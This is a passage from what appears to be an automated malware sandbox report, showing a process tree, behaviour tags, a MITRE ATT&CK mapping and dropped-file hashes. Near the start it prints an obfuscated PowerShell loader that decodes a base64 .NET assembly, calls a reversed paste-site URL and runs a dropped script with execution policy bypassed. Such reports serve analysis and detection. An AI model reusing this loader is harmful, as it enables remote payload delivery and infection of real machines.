''C:\Users\Admin\AppData\Local\Temp\ba164adf0e3d7ada31a03e9bf73e26f5.wsf'' ; $ryaeG = (Get-Content -Path ' + $qDUyJ + ' -Encoding UTF8);' ;$tWWwP += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$tWWwP += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$tWWwP += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$tWWwP += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/qMAoO/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$tWWwP | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1448
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
19cf2e61aed74e1709ba6cf28ece3cc6

SHA1
ae00f2b1d545205062099f909f99d3de67520f46

SHA256
a6e82174482377d3aed3b1fbea0f3868c325361050ce56f13c3c23f6ae33871f

SHA512
378d0ded5de2493044a969f059fd80dbd7ee8852f6d1f72354811120d80dfe8fc7e80b5af7b2b44e2c30325afd2dbb23d75f12a4d380b5df339c9bad4837223b

Download Submit
memory/2796-4-0x000007FEF588E000-0x000007FEF588F000-memory.dmp

Filesize
4KB

Download
memory/2796-7-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/2796-6-0x000000001B280000-0x000000001B562000-memory.dmp

Filesize
2.9MB

Download
memory/2796-5-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-8-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-9-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-10-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-11-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-17-0x000007FEF55D0000-0x000007FEF5F6D000-memory.dmp

Filesize
9.6MB

Download
memory/2796-18-0x000007FEF588E000-0x000007FEF588F000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing